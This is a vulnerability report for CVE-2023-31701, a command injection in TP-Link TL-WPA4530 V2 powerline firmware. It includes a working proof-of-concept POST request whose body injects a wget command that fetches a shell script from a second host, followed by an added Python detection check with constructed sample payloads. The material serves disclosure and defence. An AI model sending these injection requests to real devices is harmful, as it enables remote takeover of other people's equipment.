Headline
CVE-2023-31701: IoT-Vulns/report.md at main · FirmRec/IoT-Vulns
TP-Link TL-WPA4530 KIT V2 (EU)_170406 and V2 (EU)_161115 are vulnerable to Command Injection via _httpRpmPlcDeviceRemove.
TP-Link TL-WPA4530 V2 Vulnerability
Several command injection vulnerabilities were found in the latest version of the TL-WPA4530 V2 firmware.
Vulnerability Description
- Reference Firmware: URL
- Binary Path: /usr/bin/httpd
- Entry Url: /admin/powerline
- Affected Versions:
  - TL-WPA4530 V2 (EU)_170406
  - TL-WPA4530 V2 (EU)_161115
There is a command injection vulnerability in the functions _httpRpmPlcDeviceAdd and _httpRpmPlcDeviceRemove. After authentication, an attacker can set the devicePwd or key field in a request to launch a remote-code-execution attack.
PoC
PoC for triggering _httpRpmPlcDeviceAdd
POST /admin/powerline?form=plc_add HTTP/1.1
Host: 192.168.100.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Origin: http://192.168.100.2
Connection: close
Referer: http://192.168.100.2/
Cookie: Authorization=XXXXXXX

xxxxxxxxxxxxxxxxxxxxxxxxxx;wget http://192.168.100.254:8000/net.sh;
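
A detection check for requests of the shape shown above, added here as an example (it is not code from the report or from the vendor): it flags POSTs to /admin/powerline whose devicePwd or key value, or whose unnamed body token, contains shell metacharacters after percent-decoding. The metacharacter set, the function names, the /admin/other path and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Characters a POSIX shell treats as separators, pipes or substitutions
# (assumed set; tune it to what the device legitimately accepts).
SHELL_META = re.compile(r"[;&|`$()<>\r\n]")
WATCHED_PATH = "/admin/powerline"      # entry URL from the report
WATCHED_FIELDS = {"devicePwd", "key"}  # fields named in the report


def inspect_request(raw):
    """Return a list of findings for one raw HTTP request (empty if clean)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0] != "POST":
        return []
    if urlsplit(request_line[1]).path != WATCHED_PATH:
        return []
    findings = []
    # parse_qsl percent-decodes, so %3B is caught as well as a literal ';'.
    # keep_blank_values keeps tokens that have no '=' at all.
    pairs = parse_qsl(body.strip(), keep_blank_values=True, separator="&")
    for name, value in pairs:
        if name in WATCHED_FIELDS:
            if SHELL_META.search(value):
                findings.append(f"shell metacharacter in field {name!r}")
        elif SHELL_META.search(name):
            # Body token with no recognisable field name: check the token.
            findings.append("shell metacharacter in unnamed body token")
    return findings


def build_request(path, body):
    """Constructed sample request; headers reduced to the minimum."""
    return (f"POST {path} HTTP/1.1\r\nHost: 192.168.100.2\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + body)


# Constructed samples (not captured traffic); /admin/other is hypothetical.
BENIGN = build_request("/admin/powerline?form=plc_add", "devicePwd=ABCDEFGHIJKLMNOP")
ENCODED = build_request("/admin/powerline?form=plc_add", "key=abc%3Becho%20test%3B")
UNNAMED = build_request("/admin/powerline?form=plc_add", "xxxx;echo test;")
OTHER_PATH = build_request("/admin/other", "key=abc%3Becho%20test%3B")

if __name__ == "__main__":
    for label, req in [("benign", BENIGN), ("encoded", ENCODED),
                       ("unnamed", UNNAMED), ("other path", OTHER_PATH)]:
        print(label, inspect_request(req))
```

The check inspects plaintext requests only, so it belongs where the management traffic is visible, such as a reverse proxy or a capture on the LAN segment in front of the device.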